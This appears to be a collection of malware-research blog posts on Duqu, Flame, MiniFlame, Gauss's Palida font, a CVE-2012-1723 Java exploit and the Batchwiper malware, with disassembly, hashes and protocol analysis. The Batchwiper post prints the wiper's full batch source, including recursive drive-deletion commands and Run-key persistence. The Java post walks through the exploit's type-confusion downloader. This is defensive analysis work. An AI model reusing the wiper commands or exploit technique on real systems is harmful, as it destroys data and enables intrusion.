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How Duqu resource 302 finds the .zdata section

Just a short blog entry to save this info for the history.

We investigated originally two different pieces of duqu payload. One contained resource 302 with a compressed .zdata section, the other contained the to-be-injected code without compression. The injector-loader is the same for the two versions, then how does it find if .zdata should be loaded?

Here is the trick from netp 301 resource:

.text:10001220 mov ecx, 5A4Dh
.text:10001225 cmp [eax], cx
.text:10001228 jnz loc_100012CD
.text:1000122E mov ecx, [eax+3Ch]
.text:10001231 add ecx, eax
.text:10001233 cmp dword ptr [ecx], 4550h
.text:10001239 jnz loc_100012CD

First it checks for “MZ” header, then it check “PE” signature.

.text:1000123F movzx edx, word ptr [ecx+6] ; number of sections in PE File (5)
.text:10001243 cmp dx, 3
.text:10001247 jbe loc_100012CD
.text:1000124D movzx esi, word ptr [ecx+14h] ; pointer to symbol table
.text:10001251 movzx edx, dx
.text:10001254 imul edx, 28h ; each section entry in section table- 40 byte
.text:10001257 add edx, ecx
.text:10001259 lea edi, [esi+edx-38h] ; the section before the last section (zdata) + offset
.text:1000125D test edi, edi
.text:1000125F jz short loc_100012CD
.text:10001261 cmp dword ptr [edi+1Ch], 0BC395587h ; zdata magic PE Header NumberOfRelocations is abused
.text:10001268 jnz short loc_100012CD
.text:1000126A cmp dword ptr [edi+8], 2Ch ; some check on physical size
.text:1000126E jb short loc_100012CD

As you can see, it calculates the exact place for the end of the section table then moves back to the entry before the last (this is .zdata info). Then it checks for a magic number 0xBC395587 which is stored in “NumberOfReloctions” value.

.text:10001270 mov esi, [edi+0Ch]
.text:10001273 add esi, eax
.text:10001275 cmp dword ptr [esi], 0D139120Eh
.text:1000127B jnz short loc_100012CD

Finally it checks the first 4 bytes of the .zdata section against 0xD139120e.

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#Batchwiper – Batchwiper malware (target:Iran)

Iranian CERT Maher just posted

Latest investigation have been done by Maher center in cyber space identified a new targeted data wiping malware. Primitive analysis revealed that this malware wipes files on different drives in various predefined times. Despite its simplicity in design, the malware is efficient and can wipe disk partitions and user profile directories without being recognized by anti-virus software. However, it is not considered to be widely distributed. This targeted attack is simple in design and it is not any similarity to the other sophisticated targeted attacks. The identified components of this threat are listed in the following table”…

As it happens quite some time, the malware itself seems not to be much of interest, but the possible targets and the way they probably used it makes it more into attention. So don’t judge too early about the lameness of such tool, it can still pinpoint an important action.

The main file, GrooveMonitor.exe is a self-extracting file, it contains a rar file at position 103936. The rar contains juboot, jucheck and sleep.

GrooveMonitor.exe [dropper] f3dd76477e16e26571f8c64a7fd4a9
juboot.exe fa0b300e671f73b3b0f7f415ccbe9d41
jucheck.exe c4cd216112cbc5b8c046934843c579f6
SLEEP.EXE ea7ed6b50a9f7b31caeea372a327bd37
WmiPrv.exe b7117b5d8281acd56648c9d08fadf630

Sleep.exe is basically a public tool available for batch programmers:

juboot is a UPX 3.03 compressed archive of a probably bat2exe converted file (not checked what exactly) (very low on budget to write batch malware?), that contains these:

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"


jucheck contains
@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes
goto no


sleep for 3000
IF EXIST d:\ del "d:*." /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:*.
" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:*." /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:*.
" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:*." /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:*.
" /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\Desktop*.*" /q /s /f
\start calc


Still the questions are
a.) What is the dropper
b.) Is it surely an important attack, no matter how amateur the tools are?

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SPE/MiniFlame contains the same “main” encryption alg from ver 4.00-5.00

It looks like this:
.text:10007DDE Decrypt_str_10007DDE proc near ; CODE XREF: sub_10001223+5p
.text:10007DDE ; sub_10001223+16p ...
.text:10007DDE arg_0 = dword ptr 4
.text:10007DDE mov ecx, [esp+arg_0]
.text:10007DE2 push esi
.text:10007DE3 cmp byte ptr [ecx+0Ch], 42h
.text:10007DE7 lea esi, [ecx+0Dh]
.text:10007DEA jnz short loc_10007DF0
.text:10007DEC mov eax, esi
.text:10007DEE pop esi
.text:10007DEF retn
.text:10007DF0 ; ---------------------------------------------------------------------------
.text:10007DF0 loc_10007DF0: ; CODE XREF: Decrypt_str_10007DDE+Cj
.text:10007DF0 push ebx
.text:10007DF1 xor ebx, ebx
.text:10007DF3 xor edx, edx
.text:10007DF5 cmp [ecx+0Ah], bx
.text:10007DF9 jbe short loc_10007E16
.text:10007DFB loc_10007DFB: ; CODE XREF: Decrypt_str_10007DDE+36j
.text:10007DFB mov al, dl
.text:10007DFD add al, 6Eh
.text:10007DFF imul bl
.text:10007E01 mov bl, 0C2h
.text:10007E03 sub bl, al
.text:10007E05 sub bl, dl
.text:10007E07 add [edx+esi], bl
.text:10007E0A mov bl, [edx+esi]
.text:10007E0D movzx eax, word ptr [ecx+0Ah]
.text:10007E11 inc edx
.text:10007E12 cmp edx, eax
.text:10007E14 jb short loc_10007DFB
.text:10007E16 loc_10007E16: ; CODE XREF: Decrypt_str_10007DDE+1Bj
.text:10007E16 mov eax, esi
.text:10007E18 pop ebx
.text:10007E19 mov byte ptr [ecx+0Ch], 42h
.text:10007E1D pop esi
.text:10007E1E retn
.text:10007E1E Decrypt_str_10007DDE endp
.text:10007E1F ; =============== S U B R O U T I N E =======================================
.text:10007E1F srand_10007E1F proc near ; CODE XREF: sub_10003377+Dp
.text:10007E1F push 0 ; Time
.text:10007E21 call ds:time
.text:10007E27 push eax ; Seed
.text:10007E28 call ds:srand
.text:10007E2E pop ecx
.text:10007E2F pop ecx
.text:10007E30 retn
.text:10007E30 srand_10007E1F endp

basically the structure is of a stream-cipher, where the generated key is not XORd, but ADDed to the encrypted byte to be decrypted. This is very similar to flame. dl is a counter, so the main thing is bl and the imul function. It’s not that complicated or novel, but still interesting.

It’s a bit strange, as the encrypted string table basically consists of some 3-tuple elements, and only the middle on is encrypted by the code above. It is similar, but not that similar to other Duqu or Flame encryption technique.

Here is some perl code to make a simple decryptor:


$al= ($al+ 0x6e)%256;
$ax=$al*$bl % 65536; #imul bl?
$al=$ax % 256;
$bl= 0xc2;
$bl= ($bl -$al) %256;
$bl= ($bl -$dl) %256;
$t2= ($t+$bl) %256;
$bl= $t2;
$dl= ($dl+1) %256; #in fact dx, but dh is not used only as loop variable

if ($new==1)

output buffer: $bufall2

So after all, we can decrypt main strings. This encryption technique was not changed between 4.00-5.00 versions and also relates to USB (U) versions, too.

For v5.00 we get the following strings



) Ti

RearWindow detected no activity since delta started, maybe no one logged in?.
RearWindow failed.
RearWindow throw an exception.
function returned:
Alex ends. Result is:
Alex Starts
Sam ends. Result is:
Sam Starts
Charles ends. Result is:
Charles Starts
Drake ends. Result is:
Drake Starts
Elvis ends. Result is:
Elvis Starts
Eve ends. Result is:
Eve Starts
Sonia ends. Result is:
Sonia Starts
Fiona ends. Result is:
Fiona Starts
SP v5.00H
SYSTEM\CurrentControlSet\Hardware Profiles\Current\Software\Fonts
LSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
0Software\Microsoft\Windows\CurrentVersion\Internet Settings
k (c>

We did not cross-check it, but strange that it’s BARBAR here and not BARBARA (might be the fault of the decryptor).
The more interesting is that everybody was so interested in the language of recent targeted malware (Duqu, Flame, Gauss) and we could not get much “language mistakes” in those cases. Compared to that this is strange:

Alex ends. Result is:
Alex Starts

“Result is” is strange. “Starts” with capital S (for all functions, and all knows versions of the malware) is also strange.


“RearWindow throw an exception.” – throw or throws? surely strange. This type of error was never convicted in Duqu and Flame or we were not able to find such yet.

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Palida Narrow vs. Lucida Bright

It seems Gauss samples already started to float around, so some more info on Palida is not a surprise anymore.

Palida Narrow header info:

'head' Table - Font Header

Size = 54 bytes (expecting 54 bytes)
'head' version: 1.0
fontRevision: 1.1
checkSumAdjustment: 0xC5C64B82
magicNumber: 0x5F0F3CF5
flags: 0x001B- baseline(y)=0 - lsb(x)=0 - int ppem - nonlin aw
unitsPerEm: 2048
created: Fri Jan 28 21:48:24 2000
modified: Mon Dec 19 05:37:00 2011
xMin: -579
yMin: -804
xMax: 2298
yMax: 2033
macStyle bits: 0x0000
lowestRecPPEM: 12
fontDirectionHint: 1
indexToLocFormat: 0
glyphDataFormat: 0

Lucida Bright Regular header info:

'head' Table - Font Header

Size = 54 bytes (expecting 54 bytes)
'head' version: 1.0
fontRevision: 1.1
checkSumAdjustment: 0x8A94C916
magicNumber: 0x5F0F3CF5
flags: 0x001B- baseline(y)=0 - lsb(x)=0 - int ppem - nonlin aw
unitsPerEm: 2048
created: Fri Jan 28 19:13:11 2000
modified: Tue Mar 13 23:02:32 2001
xMin: -550
yMin: -1530
xMax: 3314
yMax: 2419
macStyle bits: 0x0000
lowestRecPPEM: 12
fontDirectionHint: 1
indexToLocFormat: 1
glyphDataFormat: 0

You can see the similarity in creation date.
The interesting thing is that Palida has 457 glyphs:

'maxp' Table - Maximum Profile

Size = 32 bytes (expecting 32 bytes)
'maxp' version: 1.0
numGlyphs: 457

from which some special characters are unusual

Glyf 440 -> PSGlyf Name # 192, name= 'dcaron1'
Glyf 441 -> PSGlyf Name # 193, name= 'Gcedilla1'
Glyf 442 -> PSGlyf Name # 194, name= 'gcedilla1'
Glyf 443 -> PSGlyf Name # 195, name= 'Kcedilla1'
Glyf 444 -> PSGlyf Name # 196, name= 'kcedilla1'
Glyf 445 -> PSGlyf Name # 197, name= 'Lcedilla1'
Glyf 446 -> PSGlyf Name # 198, name= 'lcedilla1'
Glyf 447 -> PSGlyf Name # 199, name= 'Lcaron1'
Glyf 448 -> PSGlyf Name # 200, name= 'lcaron1'
Glyf 449 -> PSGlyf Name # 201, name= 'Ncedilla1'
Glyf 450 -> PSGlyf Name # 202, name= 'ncedilla1'
Glyf 451 -> PSGlyf Name # 203, name= 'Rcedilla1'
Glyf 452 -> PSGlyf Name # 204, name= 'rcedilla1'

Or the fact the physics and math is so important that first glyphs are micro and Ohm.

PSGlyf Name # 1: micro
PSGlyf Name # 2: Ohm
PSGlyf Name # 3: increment
PSGlyf Name # 4: bulletmath
PSGlyf Name # 5: overscore
PSGlyf Name # 6: dmacron

One of the interesting glyphs is U+0104 also called Aogonek. First of all it exists mostly in CE fonts, second, it is a bit different from Lucida samples we checked. Check it yourself, too!

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On the Palida Narrow mystery of Gauss malware, and possible remote detection

As you all know, Kaspersky Lab has just published a detailed tech report of the latest state-sponsored targeted threat named Gauss.

So the story of Stuxnet, Duqu (found and named by us, CrySyS Lab ), Flame (yes, we had a detailed tech report on that, but we called it sKyWIper ) has not stopped here, and as many said, we currently see only the tip of the iceberg.

So the big mystery of Gauss is why Palida Narrow, a modified font with fake copyright notice is installed on victim computers. It seems that no exploit, shellcode or nasty payload are inside. Most likely… Then why? Do they depend on Palida Narrow? Most likely not.

One possibility is that there are other components using Palida for some reasons. E.g., tricking with some characters on web pages to hide alerts, or similar, not really clear operations.

A very far-fetched idea is that Gauss uses the font for printed material. It actually tricks some parts of the system to substitute fonts with Palida, so any prints will contain Palida. Later, printed documents could be identified by looking on the tiny specialities of the font.

A third, and more probable idea is that Palida installation can be in fact detected remotely by web servers, thus the Palida installation is a marker to identify infected computers that visit some specially crafted web pages. We tell you how.

If you open a web page, it can contain a CSS style sheet link, that actually tells your browser how the text blocks should look like on the web page. This style sheet can in fact include references to font faces to be used. The font face definition can refer to a local font and a URL also (with some limitations) in order to get the necessary font face if it is not installed on your system.

Let’s consider the following part of the CSS file:

@font-face {
font-family: "Palida";
src: local("Palida Narrow"),

This definition tells your browser to use Palida Narrow local font if available, if not, call back the webpage to download a copy.

This standard behavior of the browsers makes it possible to enumerate all the fonts that are installed in your system, but particularly to pinpoint if Palida Narrow is installed.

Considering this case, if the Palida is installed, your browser will simply use it for rendering the web page. If not, and only in that case, it will try to download palida.ttf. If there is no palida.ttf download on the web page, then you have Palida installed on the system.

However, there is a problem: what if palida.ttf was not downloaded as you have turned off the look up of remote fonts in your browser, or you use some special browser. Here is a solution: Let’s specify and use a surely non-existing font, like Crysysida:

@font-face {
font-family: "Crysysida";

  • If we have downloads for both Palida and Crysysida, then everything works great, and Palida is not installed
  • If we only see download for Crysysida, then Palida is installed on the system
  • Finally, if we see no downloads, then probably the user uses lynx or telnet to browse our webpage, or there are other circumstances that prevent the download of remote fonts.

What we detailed here is not only a possible reason of Palida having been installed on infected systems, but also a detection method for infected computers. Actually, we created a detection site of the Gauss malware by identifying Palida installations remotely. The small test site is available at

Of course the method is not bullet-proof, but an easy alternative check for those, who cannot find the fonts menu in the windows control panel.

Final note:
CrySyS Lab currently thinks, that Palida is actually a slightly modified Lucida Bright Narrow Demi Bold CE font, most likely from Bigelow and Holmes, made back in 2000, although we do not have such a sample.

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On the CVE-2012-1723 based java exploit and malware sample seen at our Lab

Authors: Boldi, Gábor Pék

Our latest post on 15/07 was about a trojan dropped by some Java applet that contains some Java exploit.
The dropped trojan is a fake antivirus software, here is some screenshot of it:

We found that the exploit in use was CVE-2012-1723, which is analyzed on a number of websites, like: (detailed tech info on exploit technique) (05/07) (09/07) (10/07)

Our sample of the exploit slightly differs from the analyses above, thus we decided to disclose some more info on that.
Our sample is an applet and java classes stored in a jar file (creation date of classes are 14/07/2012 14:37), namely 4 classes: lei, pas, pax and tee). The applet is stored in class lei.

Lei gets one parameter called “nob” which contains the URL to be downloaded and executed upon successful explotation, as shown in the code example below by javap decompile.

public class lei extends java.applet.Applet {
public static java.lang.String[] twa;

public static java.lang.String kin;

public lei();
0: aload_0
1: invokespecial #1 // Method java/applet/Applet."":()V
4: return

public void init();
0: aload_0
1: pop
2: aload_0
3: ldc #2 // String nob
5: invokevirtual #3 // Method getParameter:(Ljava/lang/String;)Ljava/lang/String;
8: ldc #4 // String @
10: invokevirtual #5 // Method java/lang/String.split:(Ljava/lang/String;)[Ljava/lang/String;
13: putstatic #6 // Field twa:[Ljava/lang/String;
16: iconst_0
17: istore_1

As it can be seen the string is stored in twa, which will be used later on the downloader class tee:

public java.lang.Object run();
0: getstatic #4 // Field lei.twa:[Ljava/lang/String;
3: astore 12

The exploitation mechanism is very similar to the samples given by the publications described above. lei == fawd of the Symantec analysis, the main applet. It uses class pas similar to fawc (Symantec) == C2 (eset) for main exploitation, which in our sample 97 pieces of variables of type “sax” named fog01..fog97. The number of variables therefore slighly differs, Symantec and ESET both reported 99 viariables, Michael ‘mihi’ Schierl talks about 100 variables.

Related part of pas:

public class pas {
static java.lang.ClassLoader fob;

sax fog1;
sax fog2;
sax fog95;
sax fog96;
sax fog97;

0: aload_0
1: invokespecial #1 // Method java/lang/Object."":()V
4: return

Or if you like it in java way, here is an image with a decompiled version:

Back to lei, it has a cycle of 100,000, like in the Mihi document.

Mihi writes:

Then use this class follows to confuse an object from type A to B:
Instantiate a new instance of your crafted class.
call its confuse method 100_000 times with arg null.
wait a few milliseconds to give JIT time to do its dirty work.
call the confuse method with your instance of A.

Our code:

26: iload_1
27: ldc #9 // int 100000
29: if_icmpge 44
32: aload_2
33: aconst_null
34: invokevirtual #10 // Method pas.gat:(Ljava/lang/ClassLoader;)Lsax;
37: pop
38: iinc 1, 1
41: goto 26
44: invokestatic #11 // Method java/lang/Thread.currentThread:()Ljava/lang/Thread;

So it uses pas.gat for 100 000 times, then wait and confuse at line 44:

44: invokestatic #11 // Method java/lang/Thread.currentThread:()Ljava/lang/Thread;
47: pop
48: ldc2_w #12 // long 11l
51: invokestatic #14 // Method java/lang/Thread.sleep:(J)V
54: aload_2
55: aload_0
56: invokevirtual #15 // Method java/lang/Object.getClass:()Ljava/lang/Class;
59: invokevirtual #16 // Method java/lang/Class.getClassLoader:()Ljava/lang/ClassLoader;
62: invokevirtual #10 // Method pas.gat:(Ljava/lang/ClassLoader;)Lsax;
65: astore_3
66: aload_3
67: invokestatic #17 // Method sax.urd:(Lsax;)V

As you can see, after exploitation sax.urd is called.

works like Mihi wrote about the confusion function:

Also add a non-static confuse method that
takes a parameter of type A and returns a result of type B
returns quickly if called with a null argument
else first calls GETSTATIC and then PUTFIELD on the static field (don’t forget to push this as the receiver to the stack for the second call!)
next checks each of the instance fields and returns the first one that is not null (ASM is great for creating loops of repetitive bytecode like that)
returns null otherwise, just to make the method return a value in all cases.

In code:

sax gat(java.lang.ClassLoader);
0: aload_1
1: ifnonnull 6
4: aconst_null
5: areturn
6: getstatic #2 // Field java/lang/System.out:Ljava/io/PrintStream;
9: getstatic #3 // Field fob:Ljava/lang/ClassLoader;
12: invokevirtual #4 // Method java/io/PrintStream.print:(Ljava/lang/Object;)V
15: aload_0
16: nop
17: aload_1
18: putfield #3 // Field fob:Ljava/lang/ClassLoader;
21: aload_0
22: getfield #5 // Field fog1:Lsax;
25: ifnull 33
28: aload_0
29: getfield #5 // Field fog1:Lsax;
32: areturn
33: aload_0
34: getfield #6 // Field fog2:Lsax;
1181: getfield #101 // Field fog97:Lsax;
1184: areturn
1185: aconst_null
1186: areturn

You can see the rapid return for null parameter then the getstatic-putfield parts nad the final return, exactly like it was described.

The sax type for fog variables is defned in sax.class. It contains zoa, owl and urd methods. As we have seen, method urd is called from lei after explitation.

urd uses the class tee to download the trojan. Defined in the run method of tee the trojan is downloaded to the temporary directory and later started with “cmd.exe /c start” by method pis. The method hes of tee defines the download InputStream for the URL (or URLs separated by @) to be downloaded with the help of goy method of lei. urd of sax not just uses tee to make the download and run, but his own owl method sets the proper permissions to fullfil its goal.


Our malware sample it very similar to the Maljava/Symantec and also the description from Mihi, although slight differences, and different naming obfuscation exists. The file to be downloaded is not hard-coded, but received as parameter.

Corresponding files and hashes:

eb710f5b0022d35a2cbf0c539528cbb3 *jar_cache9086383559255725283.tmp
f13441dbe92c099f1589e79a8b25f2ef *lei.class
ebe346ef2e2c27c73cd5d76f68e682e6 *pas.class
b9c9522a5ba97f1aec7e0189c6b2ef71 *sax.class
d6d35282a88af5be723137f564e9cb92 *tee.class

We also share VirusTotal results on our file. Notes on Virustotal results:
McAfee naming Exploit-CVE2012-1273.c shoud be 1723 instead of 1273.
Symantec names it Trojan.Maljava, although their file names and content for that sample described in slightly differ.
EXP/2012-0507.CK.2 refers to CVE-2012-0507, another java exploit

Virustotal results:

    <table style="margin-bottom:8px;margin-left:8px;">
            <tr class="collapsable hide">
            <tr class="collapsable hide">
            <tr class="collapsable hide">
              <td>File size:</td>
              <td>6.1 KB ( 6243 bytes ) </td>
              <td>File name:</td>
            <tr class="collapsable hide">
              <td>File type:</td>
            <tr class="collapsable hide">
                        <span class="label notice">jar</span>
              <td>Detection ratio:</td>
              <td class=" text-red ">15 / 41</td>
              <td>Analysis date:</td>
                  2012-07-28 22:19:41 UTC
                  ( 12 perc ago )
<table class="table table-bordered table-striped" id="antivirus-results">
            <th class="header headerSortDown">Antivirus</th>
            <th id="results-header" style="cursor:pointer;">Result</th>
            <td >-</td>
            <td >-</td>
            <td class="text-red">Exploit-CVE2012-1273.c</td>
            <td >-</td>
            <td >-</td>
            <td >-</td>
            <td >-</td>
            <td class="text-red">Trojan.Maljava</td>
            <td >-</td>
            <td >-</td>
            <td class="text-red">TROJ_GEN.F47V0720</td>
            <td class="text-red">Java:Agent-BIJ [Trj]</td>
            <td class="text-red">Win32.Trojan</td>
            <td >-</td>
            <td class="text-red">UDS:DangerousObject.Multi.Generic</td>
            <td >-</td>
            <td >-</td>
            <td >-</td>
            <td class="text-red">Troj/JavaBz-FT</td>
            <td >-</td>
            <td >-</td>
            <td >-</td>
            <td >-</td>
            <td class="text-red">EXP/2012-0507.CK.2</td>
            <td >-</td>
            <td class="text-red">Exploit-CVE2012-1273.c</td>
            <td class="text-red">Trojan-Downloader.Java.OpenConnection!IK</td>
            <td >-</td>
            <td >-</td>
            <td class="text-red">TrojanDownloader:Java/OpenConnection.PU</td>
            <td >-</td>
            <td class="text-red">Java:Agent-BIJ </td>
            <td >-</td>
            <td class="text-red">JAVA/Agent</td>
            <td >-</td>
            <td >-</td>
            <td >-</td>
            <td class="text-red">Trojan-Downloader.Java.OpenConnection</td>
            <td class="text-red">Java/JavaBz.FT!tr</td>
            <td >-</td>
            <td >-</td>
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New java dropped malware

We are investigating the report from one of our colleagues, reporting one website dropped malicious exe files by some java exploit, possibly an already known one. Of course, this is not “that” important, but keep in touch on this:
4307f1bf8d41604875d8b21c878659c0 *01388ca50e45.exe
100ad7ab0fff23a0938d5b19ede20362 *01388ca69ef2.exe
eb710f5b0022d35a2cbf0c539528cbb3 *jar_cache875449263521178018.tmp
eb710f5b0022d35a2cbf0c539528cbb3 *jar_cache9086383559255725283.tmp

Inside the jar
f13441dbe92c099f1589e79a8b25f2ef *lei.class
ebe346ef2e2c27c73cd5d76f68e682e6 *pas.class
b9c9522a5ba97f1aec7e0189c6b2ef71 *sax.class
d6d35282a88af5be723137f564e9cb92 *tee.class

Thanks for the info, K.T. (Cuby).

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Analysis of Flame WuSetupV.exe URL parameters

Basically the main functionality of the WuSetupV.exe of Flame is to create a special URL, download the main component of Flame using the special URL, store it and install it on the victim computer.

WuSetupV.exe structure

The most interesting topic is what type of data is stored inside the URL created by WuSetupV as it uses multiple parameters, like
GET /view.php?mp=1&jz=4073875454&fd=28369876&am=55597C801D14&ef=40474645&pr=0&ec=0&ov=666641736666417766664174pl=gspnZGygMcK0Gnng|spnZGy|nynn|0ncnn|TWvDKoKv|nGcRW0Gn|Dnann|Rya0ZjD8|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|n8KKDnR|GU8DKcGc|-2TacGCcap|RyZKKDne|RyZKKDne|aDo|Tn0vZLp|Txax0DZ|qxsGZx8-4GUg|cGoGeWZ|qxsGZx8-| HTTP/1.1

So let’s see how the parts of the URL are created.

The “jz=” parameter is created randomly, but reused if error occurs and second download is done. This means the value might be used multiple times within the same session, hence it is a session id.
The value is converted to decimal. The random generator is a well known simple one, the main part is

.text:00403489 mov eax, dword_4053C0
.text:0040348E imul eax, 343FDh
.text:00403494 add eax, 269EC3h ;
.text:00403499 mov dword_4053C0, eax
.text:0040349E sar eax, 10h
.text:004034A1 and eax, 7FFFh

The “am=” parameter, handled around sub_401426, contains a hex string, which is bytewise xor’d with 0x55. The hex string is 48 bits long and contains the interface MAC address. In this case am=55597C801D14 refers to the 00:0c:29:d5:48:41 VMware MAC address.

The “ef=” parameter is the IP address or IP addresses (concatenated) of the client computer, most likely it is useful if proxy server or NAT is used. The parameter is character-wise XORd with 0x44 at each byte, with the subroutine described below for parameter “ov=” (loc_402A30), and represented in hex string. In this way 0x40474645 represents IP address

The “ov=” parameter contains Windows version information. The string “ov=666641736666417766664174” can be separated into three 8-character hex string


All three parts are XOR’d with 0x66 at the end by the following simple code fragment:

.text:00402A30 loc_402A30: ; CODE XREF: xor_encr_sub_402A2E+12j
.text:00402A30 mov eax, [esp+arg_0]
.text:00402A34 mov dl, [esp+arg_4]
.text:00402A38 add eax, ecx
.text:00402A3A xor [eax], dl
.text:00402A3C inc ecx
.text:00402A3D cmp ecx, 4
.text:00402A40 jb short loc_402A30
.text:00402A42 retn

The original values are:


The originals of all of these three values are 0x2710 added as follows:

.text:0040159D mov eax, [ebp+VersionInformation.dwMajorVersion]
.text:004015A3 push 66h ; int
.text:004015A5 add eax, 2710h
.text:004015AA push edi ; lpString1
.text:004015AB push eax ; int
.text:004015AC call xor_and_printf08x_sub_402A63
.text:004015B1 add esp, 0Ch
.text:004015B4 test eax, eax
.text:004015B6 jz short loc_4015FE
.text:004015B8 mov eax, [ebp+VersionInformation.dwMinorVersion]
.text:004015BE add dword ptr [esi], 8
.text:004015C1 push 66h ; int
.text:004015C3 add eax, 2710h
.text:004015C8 push edi ; lpString1
.text:004015C9 push eax ; int
.text:004015CA call xor_and_printf08x_sub_402A63
.text:004015CF add esp, 0Ch
.text:004015D2 test eax, eax
.text:004015D4 jz short loc_4015FE
.text:004015D6 mov eax, [ebp+VersionInformation.dwPlatformId]
.text:004015DC add dword ptr [esi], 8
.text:004015DF push 66h ; int
.text:004015E1 add eax, 2710h
.text:004015E6 push edi ; lpString1
.text:004015E7 push eax ; int
.text:004015E8 call xor_and_printf08x_sub_402A63

Therefore, the string above represents

dwMajorVersion = 5
dwMinorVersion = 1
dwPlatformId = 2

From which 5.1 represents Windows XP, and VER_PLATFORM_WIN32_NT==2 as dwPlatformId.

The “fd=” parameter stores HKEY_CURRENT_USER\Console\StandardSize or in HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry dword in decimal form, depending on the Windows version. In our case it is 28369876, which is 0x01B0E3D4 in hex. This variable in the registry is not standard. If it does not exist, the StandardSize parameter is created by WuSetupV.exe as a random number seeded with time information, and stored in the registry; the related code is the following:

.text:00403C01 call time_rnd_seed_sub_4025BF
.text:00403C06 call rndgen3_4times_sub_402637
.text:00403C0B mov [esi], eax
.text:00403C0D mov dword ptr [edi], 1
.text:00403C13 mov edx, [esi]
.text:00403C15 push edx ; Data
.text:00403C16 call set_standardsize_key_sub_403DB0

The difference between “jc=” and “fd=” is that “jc=” is a session identifier, re-used only within a single run of WuSetupV.exe, while “fd=” is a permanent id for the particular computer stored in the registry.

Interestingly, libclanattack Lua script also uses StandardSize, but the corresponding key is in TimeZoneInformation:

1 [-]: GETUPVAL R0 U0 ; R0 := U0
2 [-]: GETTABLE R0 R0 K0 ; R0 := R0["remoteSafety"]
3 [-]: SELF R0 R0 K1 ; R1 := R0; R0 := R0["getRegDword"]
4 [-]: LOADK R2 K2 ; R2 := "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation"
5 [-]: LOADK R3 K3 ; R3 := "StandardSize"
6 [-]: TAILCALL R0 4 0 ; R0,... := R0(R1,R2,R3)
7 [-]: RETURN R0 0 ; return R0,...
8 [-]: RETURN R0 1 ; return

The “pr=” parameter is set according to the existence of the StandardSize parameter. If it was found by the program, then “pr=0”, if it is the first start of the malicious WuSetupV, then “pr=1” shows to the server that this is a new installation.

WuSetupV.exe looks for the registry key
But it is not interested in the time zone. In reality it looks for the StandardDateBias data inside the registry, then later it adds to “dd=” CGI parameter in decimal form. The real reason is unknown.

The longest part of the URL, the “pl=” CGI parameter is encrypted by a simple substitution table:


This way for the query

GET /view.php?mp=1&jz=4073875454&fd=28369876&am=55597C801D14&ef=40474645&pr=0&ec=0&ov=666641736666417766664174pl=gspnZGygMcK0Gnng|spnZGy|nynn|0ncnn|TWvDKoKv|nGcRW0Gn|Dnann|Rya0ZjD8|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|nR0jKnZ|n8KKDnR|GU8DKcGc|-2TacGCcap|RyZKKDne|RyZKKDne|aDo|Tn0vZLp|Txax0DZ|qxsGZx8-4GUg|cGoGeWZ|qxsGZx8-| HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mshome-f3be293c
Connection: Keep-Alive

the original value of “pl=”, which contains the list of current active processes, is in this case:

_System_Process_ System smss csrss winlogon services lsass vmacthlp svchost
svchost svchost svchost svchost spoolsv explorer VMwareTray vmtoolsd vmtoolsd alg
wscntfy wuauclt WuSetupV.ex_ regedit WuSetupV

Upon unsuccessful download, WuSetupV creates a second URL and sends it to the server like the one below:

GET /view.php?ac=1&jz=2203776806&fd=28369876&gb=0&rt=a0b0c0d HTTP/1.1

Summary of the URL parameters used by WuSetupV.exe

mp: is fixed 1 for first query
jz: session identifier
fd: computer identifier
am: MAC address of interface
ef: IP address
pr: is 0 if StandardSize already exists, pr=1 for new installations
ec: generally 0, probably some error checking related to ~DHF593.tmp file
ov: Windows version number
pl: Process list
ac: is fixed 1; used in second query
gb: 0, ??
rt: is a0b0c0d, ??
dd: value of StandardDateBias, if set

What exactly are gb, ec, rt good for?
How is the program related to ef_trace file?

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Flame USB dot file confirmed

Finally we were able to do some tests, and we can confirm Bitdefender’s finding on USB file transfer of Flame. Again, please first read our original tech report first.

If started by rundll, Flame creates “.” file within minutes.

As the file name is very special, under windows the easiest way to check is dir /a.
Under Linux you can use the good old sleuth kit:

# fls -a ./usb1
r/d 2: .
